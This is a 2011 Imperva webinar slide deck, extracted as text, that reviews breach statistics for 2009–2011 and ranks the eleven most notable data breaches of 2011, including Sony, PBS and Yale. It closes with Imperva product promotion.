Top 11 Ground-Breaking Data Breaches of 2011

Robert Rachwald Director, Security Strategy, Imperva

Agenda

Compare data breach trends in 2011 versus 2010 Examine the top eleven data security breaches of 2011 Provide guidance for 2012 data security initiatives based

on lessons from 2011

Today’s Presenter Rob Rachwald, Dir. of Security Strategy, Imperva

Research + Directs security strategy + Works with the Imperva Application Defense Center

Security experience + Fortify Software and Coverity + Helped secure Intel’s supply chain software + Extensive international experience in Japan, China, France, and

Australia

Thought leadership + Presented at RSA, InfoSec, OWASP, ISACA + Appearances on CNN, SkyNews, BBC, NY Times, and USA Today

Graduated from University of California, Berkeley

Looking Back

Volume of Stolen Data

0

50,000,000

100,000,000

150,000,000

200,000,000

250,000,000

2009 2010 2011

Source: privacyrights.org

Vol

ume

of D

ata

Take

n

Volume of Stolen Data

0

50,000,000

100,000,000

150,000,000

200,000,000

250,000,000

2009 2010 2011

Vol

ume

of D

ata

Take

n

VA Breach

Heartland Payment Systems Breach

Source: privacyrights.org

Number of Data Breach Incidents

0

50

100

150

200

250

300

350

400

450

500

2009 2010 2011

250

484 424

Source: privacyrights.org

Num

ber

of D

ata

Bre

ach

Inci

dent

s

Volume of Stolen Data by Type

0

500,000

1,000,000

1,500,000

2,000,000

2,500,000

3,000,000

Insider Physical Loss Stationary Device

Unknown Payment Fraud

2009

2010

2011

Source: privacyrights.org

Vol

ume

of D

ata

Take

n

Volume of Stolen Data by Type

0

20,000,000

40,000,000

60,000,000

80,000,000

100,000,000

120,000,000

140,000,000

Hack

Portable Device

2009

2010

2011

Vol

ume

of D

ata

Take

n

Source: privacyrights.org

The Insider Threat

Malicious Insider 33%

Non Malicious Insider 38%

Hacker 29%

Source: Securosis 2010 Data Security Survey

Data Records Taken by Vertical I

0

20,000,000

40,000,000

60,000,000

80,000,000

100,000,000

120,000,000

140,000,000

Financial/Insurance Government

2009

2010

2011

Source: privacyrights.org

Vol

ume

of D

ata

Take

n

Data Records Taken by Vertical II

0

2,000,000

4,000,000

6,000,000

8,000,000

10,000,000

12,000,000

14,000,000

Medical Education Other Retail Nonprofit

2009

2010

2011

Source: privacyrights.org

Vol

ume

of D

ata

Take

n

Data Records Taken by Vertical II

0

2,000,000

4,000,000

6,000,000

8,000,000

10,000,000

12,000,000

14,000,000

Medical Education Other Retail Nonprofit

2009

2010

2011

Source: privacyrights.org

Vol

ume

of D

ata

Take

n

Number of Data Breach Incidents by Vertical

0

50

100

150

200

250

300

350

400

450

500

2009

2010

2011

Source: privacyrights.org

Num

ber

of D

ata

Bre

ach

Inci

dent

s

Software Security Spend Growth

$13.50

$14.00

$14.50

$15.00

$15.50

$16.00

$16.50

2009 2010

$14.80

$16.50

11% increase

Bill

ion

$USD

Source: Imthishan Giado. “Global security spend to blast past $16 billion.” ITP.net. 23 Aug 2010.

Cyber Crime Milestones

#1: In 2010, Digital Theft Exceeded Physical

“Reported thefts of information and

electronic data have risen by half in the

past year and for the first time have

surpassed physical property losses as the biggest crime problem

for global companies…”

0

0.2

0.4

0.6

0.8

1

1.2

1.4

1.6

1.8

Cost per $1B

1.4

1.7

Physical Assets

Digital Assets

Source: Brooke Masters and Joseph Menn. “Data theft overtakes physical losses.” FT.com. 18 Oct. 2010.

#2: Enterprises in the Cross Hairs

“The bad guys have figured out that rather than getting $500 from 1,000 accounts you can

get $500,000 from one corporate account in one go…”

Source: Brooke Masters and Mary Watkins. “Hackers turn attention to corporate data theft.” FT.com. 18 Oct. 2010.

#3: Hacktivism Goes Corporate

Lulzsec: team of hackers focused on breaking applications and databases

Hacking for profit: strong similarity to the attacks employed by Lulzsec during their campaign

Lulzsec used: + SQL injection (SQLi) + Cross-site scripting (XSS) + Remote file inclusion (RFI)

#4: Automation is Prevailing

“investigators noticed a higher proportion of

automation with respect to attack methods…”

Source: Verizon Data Breach Report, 2010

#4: Automation is Prevailing

On Average: 27 attacks per hour

≈ 1 probe every two minutes

Apps under automated attack: 25,000 attacks per hour.

≈ 7 per second

#5: Security 2.0 May Be Coming

“The top five security providers — led by Symantec and McAfee —

accounted for 44 percent of the $16.5 billion worldwide security

software market in 2010, according to Gartner. That’s down from 60

percent in 2006.”

Source: Dina Bass and Zachary Tracer. “Hacker ‘Armageddon’ Forces Symantec, McAfee to Seek Fixes.” Bloomberg.com. 4 Aug. 2011.

#5: Security 2.0 May Be Coming

“The security industry may need to reconsider some of its fundamental

assumptions, including 'Are we really protecting users and companies?’”

--McAfee, August 2011

Source: Dan Rowinski. “McAfee to Security Industry: 'Are We Really Protecting Users and Companies?‘” The New York Times. 23 Aug. 2011.

Top 11 Ground-Breaking Breaches of 2011

#11: Yale University

The Details

Breach Size: 43,000 records Date: August 2011 Source: Network World Significance:

+ Google hacking in action + “The breach resulted when a File Transfer Protocol (FTP) server

on which the data was stored became searchable via Google as the result of a change the search engine giant made last September.”

+ Yale blamed Google!

Source: Jaikumar Vijayan. “Yale warns 43,000 about 10-month-long data breach”. Network World. 22 Aug. 2011.

#10: Cars for Sale Online

The Details

Breach Size: + $44.5M in consumer fraud + 14,000 reported incidences to law enforcement

Date: August 2011 Source: Network World Significance:

+ XSS attack moved victims to… + …Spoofed websites + Strong use of social networking

Source: Michael Cooney. “FBI warns of growing car-buying cyberscams”. Network World. 16 Aug. 2011.

The Facebook Page Still Exists!

#9: Medical Records Leaked and Placed Online

The Details

Breach Size: 300,000 medical records Date: September 2011 Source: Chicago Tribune Significance:

+ Highlights the persistent interest in medical records + Illustrates how criminals and non-criminals can use medical records

– Criminals: Blackmail and public humiliation – Non-criminals: "The information can also be used by insurance companies to

inflate rates, or by employers to deny job applicants."

+ Highlights the gaps with HIPAA HITECH + Foreshadows issues with broader digitization of electronic health

records

Source: Chicago Tribune, Sept. 2011.

#8: Cyworld

What is Cyworld?

The Details

Breach Size: 35M records + Including phone numbers, email addresses, names,

and encrypted information about the sites‘ members

Date: July 2011 Source: BBC Significance:

+ Facebook claims 800M users today + Social engineering is one of the fastest growing topics

in hacker forums

Source: “Millions hit in South Korean hack.” BBC News. 28 Jul. 2011.

#7: Facebook

The Details

Breach Size: 7K downloads per week Date: September 2011 Source: code.google.com Significance:

+ Automated Facebook hacking + Broader implications for social networking:

– Give job recommendations over Linkedin – Provide a bridgehead for further social engineering

• Ask your IT Admin (over FB – since you are friends now!) “I can't login to something, can you reset may password?”

• Defraud relatives with money scams: "I'm stuck in Vegas with no money."

Source: “fbpwn.” http://code.google.com/p/fbpwn/

How it Works

#6: Social Bots

The Details

Breach Size: + A small array of scripts programmed to pass

themselves off as real people stole 250 gigabytes worth of personal information from Facebook users in just eight weeks

Date: November 2011 Source: The Register Significance:

+ Automated Facebook hacking + Highlighted the weaknesses of Facebook’s

security

Source: Dan Goodin. “Army of 'socialbots' steal gigabytes of Facebook user data.” The Register. 1 Nov. 2011.

#5: PBS

The Details

Breach Size: + Thousands of usernames/passwords breached + Tupac resurrected

Date: May 2011 Source: The New York Times Significance:

+ Media wake up call + SQL injection becomes a common business term

Source: John Markoff. “Hackers Disrupt PBS Web Site and Post a Fake Report About a Rap Artist.” The New York Times. 30 May 2011.

#4: Phone Hacking

The Details

Breach Size: If you have to ask… Date: July 2011 Significance:

+ Hacking becomes part of our everyday lives + Anti-virus, firewalls, code review, etc…: USELESS

Source: “News International phone hacking scandal.” Wikipedia.

#3: Sony

Need To Justify The Cost of Security?

The Details

Breach Size: + 100M credit cards (12M unencrypted)

Date: April 2011 Source: Playstation.blog Significance:

+ Security becomes a business problem, not just a set of technologies

– Data governance just as important as financial reporting or brand management

– Put the role of a CISO in perspective: You need one!

Source: Patrick Seybold. “A Letter from Howard Stringer.” 5 May 2011.

#2: Government Web Sites for Sale

The Details

Breach Size: Dozens of websites for sale Date: January 2011 Source: Krebsonsecurity.com Significance:

“

Source: Brian Krebs. “Ready for Cyberwar?” Krebsonsecurity.com. 21 Jan. 2011.

“Amid all of the media and public fascination with threats like Stuxnet and weighty terms such as

“cyberwar,” it’s easy to overlook the more humdrum and persistent security threats, such as Web site

vulnerabilities. But none of these distractions should excuse U.S. military leaders from making sure their Web sites aren’t trivially hackable by script kiddies.”

#1: Chinese Hacking Industry Exposed

The Details

Breach Size: No one knows Date: April 2011 Source: Sky News Significance:

+ Highlights the partnership between government, hacking, and industry in China

+ Evidence that China is winning in their intention to be “the leader in information warfare”

Source: Holly Williams. “China's Cyber Hackers Target Western Firms.” Sky News. 18 Apr. 2011.

Further Context

Further Context

About Imperva

Usage Audit

Access Control

Rights Management

Attack Protection

Reputation Controls

Virtual Patching

Our Story in 60 Seconds

Webinar Materials

Post-Webinar Discussions

Answers to Attendee Questions

Webinar Recording Link Webinar Slides

Get LinkedIn to Imperva Data Security Direct for…

www.imperva.com